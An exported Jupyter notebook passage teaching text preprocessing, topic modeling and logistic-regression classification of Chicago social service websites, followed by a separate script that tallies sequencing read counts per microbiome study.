developer should keep in mind there is a trade-off between optimization and understandability. The general philosophy of programming in Python is that your code is meant to be as understandable by *people* as much as possible, because human time is more valuable than computer time. You should therefore lean toward understandability rather than overly optimizing your code to make it run as quickly as possible. Your future-self, code-reviewers, people who inherit your code, and anyone else who has to make sense of your code in the future will appreciate it. For our purposes, we are going to use a regular expression to match all characters that are not letters -- punctuation, quotes, special characters and numbers -- and replace them with spaces. Then we'll make all of the remaining characters lowercase. We will be using the `re` library in python for regular expression matching.
###Code
#get rid of the punctuations and set all characters to lowercase
RE_PREPROCESS = r'\W+|\d+' #the regular expressions that matches all non-characters
#get rid of punctuation and make everything lowercase
#the code below works by looping through the array of text ("corpus")
#for a given piece of text ("comment") we invoke the `re.sub` command
#the `re.sub` command takes 3 arguments: (1) the regular expression to match,
#(2) what we want to substitute in place of that matching string (' ', a space)
#and (3) the text we want to apply this to.
#we then invoke the `lower()` method on the output of the `re.sub` command
#to make all the remaining characters lowercase.
#the result is a list, where each entry in the list is a cleaned version of the
#corresponding entry in the original corpus.
#we then make the list into a numpy array to use it in analysis
processed_corpus = np.array( [ re.sub(RE_PREPROCESS, ' ', comment).lower() for comment in corpus] )
###Output
_____no_output_____
###Markdown
First Description, Before Cleaning
###Code
corpus[0]
###Output
_____no_output_____
###Markdown
This text includes a lot of useful information, but also includes some things we don't want or need. There are some weird special characters (like `\xe2\x80\x94`). There are also some numbers, which are informative and interesting to a human reading the text (phone numbers, addresses, "since 1899," "impacts the lives of nearly 20,000 children"), but when we break down the documents into individual words, the numbers will become meaningless. We'll also want to remove all punctuation, so that we can say any two things separated by a space are individual words. First Description, After Cleaning
###Code
processed_corpus[0]
###Output
_____no_output_____
###Markdown
All lowercase, all numbers and special characters have been removed. Out text is now normalized. TokenizationNow that we've cleaned our text, we can *tokenize* it by deciding which words or phrases are the most meaningful. In this case, we'll want to split our text into individual words. Normally the `CountVectorizer` handles this for us.To go from a whole document to a list of individual words, we can use the `.split()` command. By default, this command splits based on spaces in between words, so we don't need to specify that explicitly.
###Code
tokens = processed_corpus[0].split()
tokens
###Output
_____no_output_____
###Markdown
StopwordsStopwords are words that are found commonly throughout a text and carry little semantic meaning. Examples of common stopwords are prepositions, articles and common nouns. For example, the words *the* and *of* are totally ubiquitous, so they won't serve as meaningful features, whether to distinguish documents from each other or to tell what a given document is about. You may also run into words that you want to remove based on where you obtained your corpus of text or what it's about. There are many lists of common stopwords available for you to use, both for general documents and for specific contexts, so you don't have to start from scratch. We can eliminate stopwords by checking all the words in our corpus against a list of commonly occurring stopwords.
###Code
eng_stopwords = stopwords.words('english')
eng_stopwords
#sample of stopwords
#this is an example of slicing where we implicitly start at the beginning and move to the end
#we select every 10th entry in the array
eng_stopwords[::10]
###Output
_____no_output_____
###Markdown
Notice that this list includes "weren" and "hasn" as well as single letters ("t"). Why do you think these are contained in the list of stopwords? --- Exercise 3Try slicing after 5th word.
###Code
eng_stopwords[::5]
###Output
_____no_output_____
###Markdown
--- Topic Modeling on Cleaned DataNow that we've cleaned up our data a little bit, let's see what our bag of words looks like.
###Code
processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus, stop_words=eng_stopwords)
dict_processed_word_counts = get_word_counts(processed_bag_of_words, processed_features)
dict_processed_word_counts
###Output
_____no_output_____
###Markdown
Much better! Now this is starting to look like a reasonable representation of our corpus of text. We mentioned that, in addition to stopwords that are common across all types of text analysis problems, there will also be specific stopwords based on the context of your domain. Notice how the top words include words like "services," "youth," "community," "mission"? It makes sense that these words are so common, but we'd expect to see them in every website in our corpus - after all, we're looking at websites of social service organizations in Chicago! - so they won't be very helpful in analysis. One quick way to remove some of these domain-specific stopwords is by dropping some of your most frequent words. We'll start out by dropping the top 20. You'll want to change this number, playing with making it bigger and smaller, to see how it affects your resulting topics.
###Code
top_20_words = list(dict_processed_word_counts.keys())[:20]
domain_specific_stopwords = eng_stopwords + top_20_words
processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus,
stop_words=domain_specific_stopwords)
dict_processed_word_counts = get_word_counts(processed_bag_of_words, processed_features)
dict_processed_word_counts
###Output
_____no_output_____
###Markdown
This is a bit better - although we still see some words that are probably very common ("care", "communities"), words like "catholic," "north," and "violence" will probably help us come up with more specific categories within the broader realm of social services. Let's see what topics we produce.
###Code
processed_keywords, processed_doctopic = create_topics(processed_bag_of_words,
processed_features)
###Output
_____no_output_____
###Markdown
Now we are starting to get somewhere! We can manipulate the number of topics we want to find and the number of words to use for each topic to see if we can understand more from our corpus.
###Code
processed_keywords, processed_doctopic = create_topics(processed_bag_of_words,
processed_features,
N_TOPICS = 5,
N_TOP_WORDS= 10)
###Output
_____no_output_____
###Markdown
Some structure is starting to reveal itself - "legal" and "law" appear in the same topic, as do "violence," "domestic," and "women" (probably appearing in websites of women's shelters). Adding more topics has revealed two larger subtopics. Let's see if increasing the number of topics gives us more information.However, we can see that "donatebutton" and "companylogo" are still present - these are more likely artifacts of the websites than useful information about the charities! This is an iterative process - after seeing the results of some analysis, you will need to go back to the preprocessing step and add more words to your list of stopwords or change how you cleaned the data.
###Code
processed_keywords, processed_doctopic = create_topics(processed_bag_of_words,
processed_features,
N_TOPICS = 10,
N_TOP_WORDS= 15)
###Output
_____no_output_____
###Markdown
This looks like a good number of topics for now. Some of the top words are quite similar, like "volunteer" and "volunteers," or "child" and "children." Let's move to stemming and lemmatization. Stemming and LemmatizationWe can further process our text through *stemming and lemmatization*, or replacing words with their root or simplest form. For example "systems," "systematic," and "system" are all different words, but we can replace all these words with "system" without sacrificing much meaning. A **lemma** is the original dictionary form of a word (e.g. the lemma for "lies," "lied," and "lying" is "lie"). The process of turning a word into its simplest form is **stemming**. There are several well-known stemming algorithms -- Porter, Snowball, Lancaster -- that all have their respective strengths and weaknesses. For this tutorial, we'll use the Snowball Stemmer.
###Code
stemmer = SnowballStemmer("english")
print(stemmer.stem('lies'))
print(stemmer.stem("lying"))
print(stemmer.stem('systematic'))
print(stemmer.stem("running"))
processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus,
stop_words=domain_specific_stopwords,
stem=False)
processed_keywords, processed_doctopic = create_topics(processed_bag_of_words,
processed_features,
N_TOPICS = 10,
N_TOP_WORDS= 15)
###Output
_____no_output_____
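###Markdown
For comparison with the stemmer above, a lemmatizer maps each word to its dictionary form (its lemma) rather than a truncated stem. Below is a minimal sketch using NLTK's WordNet lemmatizer; it assumes the WordNet corpus has been downloaded (e.g. via `nltk.download('wordnet')`), which is not done elsewhere in this notebook.
###Code
from nltk.stem import WordNetLemmatizer
lemmatizer = WordNetLemmatizer()
print(lemmatizer.lemmatize('lies'))          # treated as a noun by default -> 'lie'
print(lemmatizer.lemmatize('lying', 'v'))    # tagged as a verb -> 'lie'
print(lemmatizer.lemmatize('systems'))       # -> 'system'
###Output
_____no_output_____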
###Markdown
N-gramsObviously, reducing a document to a bag of words means losing much of its meaning - we put words in certain orders, and group words together in phrases and sentences, precisely to give them more meaning. If you follow the processing steps we've gone through so far, splitting your document into individual words and then removing stopwords, you'll completely lose all phrases like "kick the bucket," "commander in chief," or "sleeps with the fishes." One way to address this is to break down each document similarly, but rather than treating each word as an individual unit, treat each group of 2 words, or 3 words, or *n* words, as a unit. We call this a "bag of *n*-grams," where *n* is the number of words in each chunk. Then you can analyze which groups of words commonly occur together (in a fixed order). Let's transform our corpus into a bag of n-grams with *n*=2: a bag of 2-grams, AKA a bag of bi-grams.
###Code
processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus,
stop_words=domain_specific_stopwords,
stem=True,
NGRAM_RANGE=(0,2))
processed_keywords, processed_doctopic = create_topics(processed_bag_of_words,
processed_features,
N_TOPICS = 10,
N_TOP_WORDS= 15)
###Output
_____no_output_____
###Markdown
We can see that this lets us uncover patterns that we couldn't when we just used a bag of words: "north shore" and "domest violenc" come up as features. Note that this still includes the individual words, as well as the bi-grams. TF-IDF (Term Frequency-Inverse Document Frequency)A final step in cleaning and processing our text data is **Term Frequency-Inverse Document Frequency (TF-IDF)**. TF-IDF is based on the idea that the words (or terms) that are most related to a certain topic will occur frequently in documents on that topic, and infrequently in others. TF-IDF reweights the words so that we emphasize words that are unique to a document and suppress words that are common throughout the corpus, by inversely weighting each word by its frequency across the corpus.
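A common formulation weights each term $t$ in document $d$ as $\mathrm{tfidf}(t, d) = \mathrm{tf}(t, d) \times \log\frac{N}{\mathrm{df}(t)}$, where $\mathrm{tf}(t, d)$ is the count of $t$ in $d$, $N$ is the number of documents, and $\mathrm{df}(t)$ is the number of documents containing $t$; the `TfidfTransformer` used below applies a smoothed, sublinear variant of this idea rather than this exact formula.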
###Code
processed_bag_of_words, processed_features = create_bag_of_words(processed_corpus,
stop_words=domain_specific_stopwords,
stem=True,
NGRAM_RANGE=(0,2),
USE_IDF = True)
dict_word_counts = get_word_counts(processed_bag_of_words,
processed_features)
dict_word_counts
###Output
_____no_output_____
###Markdown
The word counts have been reweighted to emphasize the more meaningful words of the corpus, while de-emphasizing the words that are found commonly throughout the corpus.
###Code
processed_keywords, processed_doctopic = create_topics(processed_bag_of_words,
processed_features,
N_TOPICS = 10,
N_TOP_WORDS= 15)
###Output
_____no_output_____
###Markdown
--- Exercise 4You can only develop an intuition for the right number of topics and topic words suitable for a given problem by iterating until you find a good match. Change the number of topics and topic words until you get an intuition of how many words and topics are enough.
###Code
exercise_keywords, exercise_doctopic = create_topics(processed_bag_of_words,
processed_features,
N_TOPICS = 5,
N_TOP_WORDS= 25)
exercise_keywords, exercise_doctopic = create_topics(processed_bag_of_words,
processed_features,
N_TOPICS = 10,
N_TOP_WORDS= 25)
###Output
_____no_output_____
###Markdown
---
###Code
#grab the topic_id of the majority topic for each document and store it in a list
ls_topic_id = [np.argsort(processed_doctopic[comment_id])[::-1][0] for comment_id in range(len(corpus))]
df_socialservices_data['topic_id'] = ls_topic_id #add to the dataframe so we can compare with the job titles
###Output
_____no_output_____
###Markdown
Now that each row is tagged with a topic ID, let's see how well the topics explain the social services by looking at the first topic, and seeing how similar the social services within that topic are to each other.
###Code
topic_num = 0
print(processed_keywords[topic_num])
df_socialservices_data[ df_socialservices_data.topic_id == topic_num ].head(10)
###Output
_____no_output_____
###Markdown
--- Exercise 5Examine the other topic IDs, and see if the "topics" we identified make sense as groupings of social service agencies.
###Code
topic_num = 3
print(processed_keywords[topic_num])
df_socialservices_data[ df_socialservices_data.topic_id == topic_num ].head(10)
###Output
_____no_output_____
###Markdown
--- Supervised Learning: Document ClassificationPreviously, we used topic modeling to infer relationships between social service facilities within the data. That is an example of unsupervised learning: we were looking to uncover structure in the form of topics, or groups of agencies, but we did not necessarily know the ground truth of how many groups we should find or which agencies belonged in which group. Now we turn our attention to supervised learning. In supervised learning, we have a *known* outcome or label (*Y*) that we want to produce given some data (*X*), and in general, we want to be able to produce this *Y* when we *don't* know it, or when we *only* have *X*. In order to produce labels we need to first have examples our algorithm can learn from, a "training set." In the context of text analysis, developing a training set can be very expensive, as it can require a large amount of human labor or linguistic expertise. **Document classification** is an example of supervised learning in which we want to characterize our documents based on their contents (*X*). A common example of document classification is spam e-mail detection. Another example of supervised learning in text analysis is *sentiment analysis*, where *X* is our documents and *Y* is the state of the author. This "state" is dependent on the question you're trying to answer, and can range from the author being happy or unhappy with a product to the author being politically conservative or liberal. Another example is *part-of-speech tagging* where *X* are individual words and *Y* is the part-of-speech. In this section, we'll train a classifier to classify social service agencies. Let's see if we can label a new website as belonging to facility type "income" or "health." Load the Data
###Code
df_socialservices_data.factype.value_counts()
mask = df_socialservices_data.factype.isin(['income','health'])
df_income_health = df_socialservices_data[mask]
df_train, df_test = train_test_split(df_income_health, test_size=0.20, random_state=17)
df_train.head()
df_train['factype'].unique()
Counter(df_train['factype'].values)
df_test.head()
df_test['factype'].unique()
Counter(df_test['factype'].values)
###Output
_____no_output_____
###Markdown
Process DataIn order to feed our data into a classifier, we need to pull out the labels (*Y*) and a clean corpus of documents (*X*) for our training and testing sets.
###Code
train_labels = df_train.factype.values
train_corpus = np.array( [re.sub(RE_PREPROCESS, ' ', text).lower() for text in df_train.textfromurl.values])
test_labels = df_test.factype.values
test_corpus = np.array( [re.sub(RE_PREPROCESS, ' ', text).lower() for text in df_test.textfromurl.values])
labels = np.append(train_labels, test_labels)
###Output
_____no_output_____
###Markdown
Just as we had done in the unsupervised learning context, we have to transform our data. This time we have to transform our testing and training set into two different bags of words. The classifier will learn from the training set, and we will evaluate the classifier's performance on the testing set.
###Code
#parameters for vectorizer
ANALYZER = "word" #unit of features are single words rather than phrases of words
STRIP_ACCENTS = 'unicode'
TOKENIZER = None
NGRAM_RANGE = (0,2) #Range for phrases of words
MIN_DF = 0.01 # Exclude words that have a frequency less than the threshold
MAX_DF = 0.8 # Exclude words that have a frequency greater than the threshold
vectorizer = CountVectorizer(analyzer=ANALYZER,
tokenizer=None, # alternatively tokenize_and_stem but it will be slower
ngram_range=NGRAM_RANGE,
stop_words = stopwords.words('english'),
strip_accents=STRIP_ACCENTS,
min_df = MIN_DF,
max_df = MAX_DF)
NORM = None #no normalization of the term vectors
SMOOTH_IDF = True #prevents division by zero errors
SUBLINEAR_IDF = True #replace TF with 1 + log(TF)
USE_IDF = True #flag to control whether to use TFIDF
transformer = TfidfTransformer(norm = NORM,smooth_idf = SMOOTH_IDF,sublinear_tf = True)
#get the bag-of-words from the vectorizer and
#then use TFIDF to limit the tokens found throughout the text
start_time = time.time()
train_bag_of_words = vectorizer.fit_transform( train_corpus ) #fit the vectorizer on the training corpus only
test_bag_of_words = vectorizer.transform( test_corpus )
if USE_IDF:
train_tfidf = transformer.fit_transform(train_bag_of_words)
test_tfidf = transformer.transform(test_bag_of_words)
features = vectorizer.get_feature_names()
print('Time Elapsed: {0:.2f}s'.format(
time.time()-start_time))
###Output
_____no_output_____
###Markdown
We cannot pass the labels "income" or "health" directly to the classifier. Instead, we need to encode them as 0s and 1s using the `LabelEncoder` from `sklearn`.
###Code
#relabel our labels as a 0 or 1
le = preprocessing.LabelEncoder()
le.fit(labels)
labels_binary = le.transform(labels)
list(zip(labels,labels_binary))
###Output
_____no_output_____
###Markdown
We also need to create arrays of indices so we can access the training and testing sets accordingly.
###Code
train_size = df_train.shape[0]
train_set_idx = np.arange(0,train_size)
test_set_idx = np.arange(train_size, len(labels))
train_labels_binary = labels_binary[train_set_idx]
test_labels_binary = labels_binary[test_set_idx]
###Output
_____no_output_____
###Markdown
The classifier we are using in the example is LogisticRegression. As we saw in the Machine Learning tutorial, first we decide on a classifier, then we fit the classifier to the data to create a model. We can then test our model on the test set by passing the features (*X*) from our test set to get predicted labels. The model will output the probability of each document being classified as income or health.
###Code
clf = LogisticRegression(penalty='l1')
mdl = clf.fit(train_tfidf, labels_binary[train_set_idx]) #train the classifer to get the model
y_score = mdl.predict_proba( test_tfidf ) #score of the document referring to an income or health agency
###Output
_____no_output_____
###Markdown
Evaluation
###Code
def plot_precision_recall_n(y_true, y_prob, model_name):
"""
y_true: ls
ls of ground truth labels
y_prob: ls
ls of predic proba from model
model_name: str
str of model name (e.g, LR_123)
"""
from sklearn.metrics import precision_recall_curve
y_score = y_prob
precision_curve, recall_curve, pr_thresholds = precision_recall_curve(y_true, y_score)
precision_curve = precision_curve[:-1]
recall_curve = recall_curve[:-1]
pct_above_per_thresh = []
number_scored = len(y_score)
for value in pr_thresholds:
num_above_thresh = len(y_score[y_score>=value])
pct_above_thresh = num_above_thresh / float(number_scored)
pct_above_per_thresh.append(pct_above_thresh)
pct_above_per_thresh = np.array(pct_above_per_thresh)
plt.clf()
fig, ax1 = plt.subplots()
ax1.plot(pct_above_per_thresh, precision_curve, 'b')
ax1.set_xlabel('percent of population')
ax1.set_ylabel('precision', color='b')
ax1.set_ylim(0,1.05)
ax2 = ax1.twinx()
ax2.plot(pct_above_per_thresh, recall_curve, 'r')
ax2.set_ylabel('recall', color='r')
ax2.set_ylim(0,1.05)
name = model_name
plt.title(name)
plt.show()
plot_precision_recall_n(labels_binary[test_set_idx], y_score[:,1], 'LR')
###Output
_____no_output_____
###Markdown
If we examine our precision-recall curve we can see that our precision is 1 up to 40 percent of the population. We can use a "precision at *k*" curve to see what percent of the corpus can be tagged by the classifier, and which should undergo a manual clerical review. Based on this curve, we might say that we can use our classifier to tag the 25% of the documents that have the highest scores as 1, and manually review the rest. Alternatively, we can try to maximize the entire precision-recall space. In this case we need a different metric.
###Code
def plot_precision_recall(y_true,y_score):
"""
Plot a precision recall curve
Parameters
----------
y_true: ls
ground truth labels
y_score: ls
score output from model
"""
precision_curve, recall_curve, pr_thresholds = precision_recall_curve(y_true,y_score[:,1])
plt.plot(recall_curve, precision_curve)
plt.xlabel('Recall')
plt.ylabel('Precision')
auc_val = auc(recall_curve,precision_curve)
print('AUC-PR: {0:1f}'.format(auc_val))
plt.show()
plt.clf()
plot_precision_recall(labels_binary[test_set_idx],y_score)
###Output
_____no_output_____
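###Markdown
To act on the "precision at *k*" idea above, we can turn the chosen fraction into a score threshold. The sketch below reuses `y_score` from the fitted model; the 25% figure is just the illustrative cutoff discussed above, not a tuned value.
###Code
# score above which a document is in the top 25% of predicted probabilities
threshold = np.percentile(y_score[:, 1], 75)
auto_tagged = y_score[:, 1] >= threshold    # tag these documents as 1 automatically
print('{} documents auto-tagged, {} left for clerical review'.format(
    auto_tagged.sum(), (~auto_tagged).sum()))
###Output
_____no_output_____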
###Markdown
The AUC shows how accurate our scores are under different cutoff thresholds. The model will output a score between 0 and 1. We specify a range of cutoff values and label all of the examples as 0 or 1 based on whether they are above or below each cutoff value. The closer our scores are to the true values, the more resilient they are to different cutoffs. For instance, if our scores were perfect, our AUC would be 1. Feature Importances
###Code
def display_feature_importances(coef,features, labels, num_features=10):
"""
output feature importances
Parameters
----------
coef: numpy
feature importances
features: ls
feature names
labels: ls
labels for the classifier
num_features: int
number of features to output (default 10)
Example
--------
"""
dict_feature_importances = dict( zip(features, coef) )
orddict_feature_importances = OrderedDict(
sorted(dict_feature_importances.items(), key=lambda x: x[1]) )
ls_sorted_features = list(orddict_feature_importances.keys())
label0_features = ls_sorted_features[:num_features]
label1_features = ls_sorted_features[-num_features:]
print(labels[0],label0_features)
print(labels[1], label1_features)
display_feature_importances(mdl.coef_.ravel(), features, ['health','income'])
###Output
_____no_output_____
###Markdown
The feature importances give us the words which are the most relevant for distinguishing the type of social service agency (between income and health). Some of these make sense ("city church" seems more likely to be health than income), but some don't make as much sense, or seem to be artifacts from the website that we should remove ("housing humancarelogo"). --- Exercise 6 Display the top 25 feature importances to get an intuition of which words are the most and least important. We need to know how to tell the function that we want the top 25 feature importances. We can do this by consulting the docstring of the function. From this docstring we can see that `num_features` is a keyword argument that is set to 10 by default. We can pass `num_features=25` into the keyword argument instead to get the top 25 feature importances.
###Code
display_feature_importances(mdl.coef_.ravel(),
features,
['health','income'],
num_features=25)
###Output
_____no_output_____
###Markdown
--- Cross-validationRecall from the machine learning tutorial that we are seeking to find the most general pattern in the data in order to have the most general model that will be successful at classifying new unseen data. Our previous strategy above was the *Out-of-sample and holdout set*. With this strategy we try to find a general pattern by randomly dividing our data into a test and training set based on some percentage split (e.g., 50-50 or 80-20). We train on the training set and evaluate on the test set, where we pretend that we don't have the labels for the test set. A significant drawback with this approach is that we may be lucky or unlucky with our random split, and so our estimate of how we'd perform on truly new data is overly optimistic or overly pessimistic. A possible solution is to create many random splits into training and testing sets and evaluate each split to estimate the performance of a given model. A more sophisticated holdout training and testing procedure is *cross-validation*. In cross-validation we split our data into *k* folds or partitions, where *k* is usually 5 or 10. We then iterate k times. In each iteration, one of the folds is used as a test set, and the rest of the folds are combined to form the training set. We can then evaluate the performance at each iteration to estimate the performance of a given method. An advantage of using cross-validation is that all examples of data are used in the training set at least once.
###Code
def create_test_train_bag_of_words(train_corpus, test_corpus):
"""
Create test and training set bag of words
Parameters
----------
train_corpus: ls
ls of raw text for text corpus.
test_corpus: ls
ls of raw text for train corpus.
Returns
-------
(train_bag_of_words,test_bag_of_words): scipy sparse matrix
bag-of-words representation of train and test corpus
features: ls
ls of words used as features.
"""
#parameters for vectorizer
    ANALYZER = "word" #unit of features are single words rather than phrases of words
STRIP_ACCENTS = 'unicode'
TOKENIZER = None
    NGRAM_RANGE = (0,2) #Range for phrases of words
MIN_DF = 0.01 # Exclude words that have a frequency less than the threshold
    MAX_DF = 0.8 # Exclude words that have a frequency greater than the threshold
vectorizer = CountVectorizer(analyzer=ANALYZER,
tokenizer=None, # alternatively tokenize_and_stem but it will be slower
ngram_range=NGRAM_RANGE,
stop_words = stopwords.words('english'),
strip_accents=STRIP_ACCENTS,
min_df = MIN_DF,
max_df = MAX_DF)
    NORM = None #no normalization of the term vectors
SMOOTH_IDF = True #prevents division by zero errors
SUBLINEAR_IDF = True #replace TF with 1 + log(TF)
USE_IDF = True #flag to control whether to use TFIDF
transformer = TfidfTransformer(norm = NORM,smooth_idf = SMOOTH_IDF,sublinear_tf = True)
#get the bag-of-words from the vectorizer and
#then use TFIDF to limit the tokens found throughout the text
train_bag_of_words = vectorizer.fit_transform( train_corpus )
test_bag_of_words = vectorizer.transform( test_corpus )
if USE_IDF:
train_tfidf = transformer.fit_transform(train_bag_of_words)
test_tfidf = transformer.transform(test_bag_of_words)
features = vectorizer.get_feature_names()
return train_tfidf, test_tfidf, features
from sklearn.cross_validation import StratifiedKFold
cv = StratifiedKFold(train_labels_binary, n_folds=3)
train_labels_binary = le.transform(train_labels)
for i, (train,test) in enumerate(cv):
cv_train = train_corpus[train]
cv_test = train_corpus[test]
bag_of_words_train, bag_of_words_test, feature_names = create_test_train_bag_of_words(cv_train,
cv_test)
probas_ = clf.fit(bag_of_words_train,
train_labels_binary[train]).predict_proba(bag_of_words_test)
cv_test_labels = train_labels_binary[test]
precision_curve, recall_curve, pr_thresholds = precision_recall_curve(cv_test_labels,
probas_[:,1])
auc_val = auc(recall_curve,precision_curve)
plt.plot(recall_curve, precision_curve, label='AUC-PR {0} {1:.2f}'.format(i,auc_val))
plt.ylim(0,1.05)
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.legend(loc="lower left", fontsize='x-small')
###Output
_____no_output_____
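###Markdown
The text below mentions averaging the AUC-PR across iterations, while the loop above only plots each fold. A minimal sketch of the averaging step, reusing the same `cv`, `clf`, and helper function defined above:
###Code
fold_aucs = []
for train, test in cv:
    # rebuild the fold-specific bags of words and refit the classifier
    tr_bow, te_bow, _ = create_test_train_bag_of_words(train_corpus[train], train_corpus[test])
    probas_ = clf.fit(tr_bow, train_labels_binary[train]).predict_proba(te_bow)
    precision_curve, recall_curve, _ = precision_recall_curve(train_labels_binary[test], probas_[:, 1])
    fold_aucs.append(auc(recall_curve, precision_curve))
print('mean AUC-PR across folds: {0:.2f}'.format(np.mean(fold_aucs)))
###Output
_____no_output_____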
###Markdown
In this case we did 3-fold cross-validation and plotted precision-recall curves for each iteration. You can see that there is a marked difference between the iterations. We can then average the AUC-PR of each iteration to estimate the performance of our method. --- Exercise 7 Try 5-fold cross-validation.
###Code
from sklearn.cross_validation import StratifiedKFold
cv = StratifiedKFold(train_labels_binary, n_folds=5)
train_labels_binary = le.transform(train_labels)
for i, (train,test) in enumerate(cv):
cv_train = train_corpus[train]
cv_test = train_corpus[test]
bag_of_words_train, bag_of_words_test, feature_names = create_test_train_bag_of_words(cv_train,
cv_test)
probas_ = clf.fit(bag_of_words_train,
train_labels_binary[train]).predict_proba(bag_of_words_test)
cv_test_labels = train_labels_binary[test]
precision_curve, recall_curve, pr_thresholds = precision_recall_curve(cv_test_labels,
probas_[:,1])
auc_val = auc(recall_curve,precision_curve)
plt.plot(recall_curve, precision_curve, label='AUC-PR {0} {1:.2f}'.format(i,auc_val))
plt.ylim(0,1.05)
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.legend(loc="lower left", fontsize='x-small')
###Output
_____no_output_____
###Markdown
--- Examples of Tagging
###Code
df_test
num_comments = 2
label0_comment_idx = y_score[:,1].argsort()[:num_comments]
label1_comment_idx = y_score[:,1].argsort()[-num_comments:]
test_set_labels = labels[test_set_idx]
#convert back to the indices of the original dataset
top_comments_testing_set_idx = np.concatenate([label0_comment_idx,
label1_comment_idx])
#these are the 4 comments the model is most sure of (the 2 lowest- and 2 highest-scoring)
for i in top_comments_testing_set_idx:
print(
u"""{}:{}\n---\n{}\n===""".format(test_set_labels[i],
y_score[i,1],
test_corpus[i]))
###Output
_____no_output_____ |
scripts/count_reads.ipynb | ###Markdown
Create a table with mean, std and median of number of reads per sample for each study
###Code
def count_reads(out_file,rarefaction_depths):
'''Count the reads for each sample in each cohort and save the mean, median and std
Parameters
----------
out_file:str
name of the output tsv file
rarefaction_depths: list of int
the rarefactions to test
'''
cols = ['cohort','mean','median','std','num_samples','num_HC','num_disease']
for crare in rarefaction_depths:
cols.append('num_rare_%d' % crare)
df=pd.DataFrame(columns=cols)
out_file = join(save_dir,out_file)
num_processed = 0
for cname in glob.glob('../studies/*'):
if os.path.isdir(cname):
print('**********')
print(cname)
tables = glob.glob(os.path.join(cname,'all.*biom'))
print(tables)
if len(tables)==0:
print('dir %s does not contain a biom table' % cname)
continue
bt=tables[0]
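            # read_amplicon loads the biom table together with the mapping file;
            # with calour, min_reads=1000 drops samples that have fewer than 1000
            # reads and normalize=10000 rescales each remaining sample to 10,000 reads.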
data=ca.read_amplicon(os.path.join(bt),os.path.join(cname,'up.map.csv'),normalize=10000,min_reads=1000)
data=data.filter_samples('type',['HC','disease'])
print('-------------')
print(data)
cline={}
cline['cohort']=cname
cline['mean']=np.mean(data.sample_metadata._calour_original_abundance)
cline['median']=np.median(data.sample_metadata._calour_original_abundance)
cline['std']=np.std(data.sample_metadata._calour_original_abundance)
cline['num_samples'] = len(data.sample_metadata)
cline['num_HC'] = np.sum(data.sample_metadata['type']=='HC')
cline['num_disease'] = np.sum(data.sample_metadata['type']=='disease')
for crare in rarefaction_depths:
cline['num_rare_%d' % crare] = np.sum(data.sample_metadata._calour_original_abundance >= crare)
df = df.append(cline,ignore_index=True)
num_processed += 1
print('processed %d studies' % num_processed)
df.to_csv(out_file,sep='\t')
ca.set_log_level('ERROR')
count_reads(out_file='summary.txt', rarefaction_depths=[1000, 4000, 7500, 10000])
###Output
**********
../studies/61
['../studies/61/all.biom']
-------------
AmpliconExperiment with 41 samples, 2715 features
**********
../studies/59
['../studies/59/all.biom']
-------------
AmpliconExperiment with 33 samples, 2637 features
**********
../studies/50
['../studies/50/all.biom']
-------------
AmpliconExperiment with 58 samples, 959 features
**********
../studies/57
['../studies/57/all.biom']
-------------
AmpliconExperiment with 85 samples, 4058 features
**********
../studies/32
['../studies/32/all.biom']
-------------
AmpliconExperiment with 43 samples, 1748 features
**********
../studies/56
['../studies/56/all.biom']
-------------
AmpliconExperiment with 43 samples, 3045 features
**********
../studies/51
['../studies/51/all.biom']
-------------
AmpliconExperiment with 164 samples, 3240 features
**********
../studies/58
['../studies/58/all.biom']
-------------
AmpliconExperiment with 45 samples, 3005 features
**********
../studies/60
['../studies/60/all.biom']
-------------
AmpliconExperiment with 73 samples, 3771 features
**********
../studies/34
['../studies/34/all.biom']
-------------
AmpliconExperiment with 32 samples, 1234 features
**********
../studies/33
['../studies/33/all.biom']
-------------
AmpliconExperiment with 58 samples, 1250 features
**********
../studies/20
['../studies/20/all.biom']
-------------
AmpliconExperiment with 151 samples, 1622 features
**********
../studies/18
['../studies/18/all.biom']
-------------
AmpliconExperiment with 84 samples, 1183 features
**********
../studies/27
['../studies/27/all.biom']
-------------
AmpliconExperiment with 233 samples, 1403 features
**********
../studies/9
['../studies/9/all.biom']
-------------
AmpliconExperiment with 451 samples, 3722 features
**********
../studies/11
['../studies/11/all.biom']
-------------
AmpliconExperiment with 109 samples, 2312 features
**********
../studies/7
['../studies/7/all.biom']
-------------
AmpliconExperiment with 441 samples, 4403 features
**********
../studies/29
['../studies/29/all.biom']
-------------
AmpliconExperiment with 594 samples, 3470 features
**********
../studies/16
['../studies/16/all.biom']
-------------
AmpliconExperiment with 119 samples, 2116 features
**********
../studies/42
['../studies/42/all.biom']
-------------
AmpliconExperiment with 96 samples, 3829 features
**********
../studies/45
['../studies/45/all.biom']
-------------
AmpliconExperiment with 1043 samples, 14981 features
**********
../studies/6
['../studies/6/all.biom']
-------------
AmpliconExperiment with 612 samples, 4175 features
**********
../studies/28
['../studies/28/all.biom']
-------------
AmpliconExperiment with 135 samples, 1306 features
**********
../studies/17
['../studies/17/all.biom']
-------------
AmpliconExperiment with 50 samples, 2307 features
**********
../studies/1
['../studies/1/all.biom']
-------------
AmpliconExperiment with 38 samples, 1082 features
**********
../studies/10
['../studies/10/all.biom']
-------------
AmpliconExperiment with 174 samples, 3295 features
**********
../studies/19
['../studies/19/all.biom']
-------------
AmpliconExperiment with 68 samples, 1401 features
**********
../studies/26
['../studies/26/all.biom']
-------------
AmpliconExperiment with 25 samples, 11834 features
**********
../studies/8
['../studies/8/all.biom']
-------------
AmpliconExperiment with 33 samples, 780 features
**********
../studies/21
['../studies/21/all.biom']
-------------
AmpliconExperiment with 178 samples, 2597 features
**********
../studies/44
['../studies/44/all.biom']
-------------
AmpliconExperiment with 835 samples, 11915 features
**********
../studies/43
['../studies/43/all.biom']
-------------
AmpliconExperiment with 89 samples, 3426 features
**********
../studies/36
['../studies/36/all.biom']
-------------
AmpliconExperiment with 15 samples, 1191 features
**********
../studies/31
['../studies/31/all.biom']
-------------
AmpliconExperiment with 70 samples, 1929 features
**********
../studies/62
['../studies/62/all.biom']
-------------
AmpliconExperiment with 196 samples, 5813 features
**********
../studies/54
['../studies/54/all.biom']
-------------
AmpliconExperiment with 63 samples, 3657 features
**********
../studies/53
['../studies/53/all.biom']
-------------
AmpliconExperiment with 115 samples, 4878 features
**********
../studies/37
['../studies/37/all.biom']
-------------
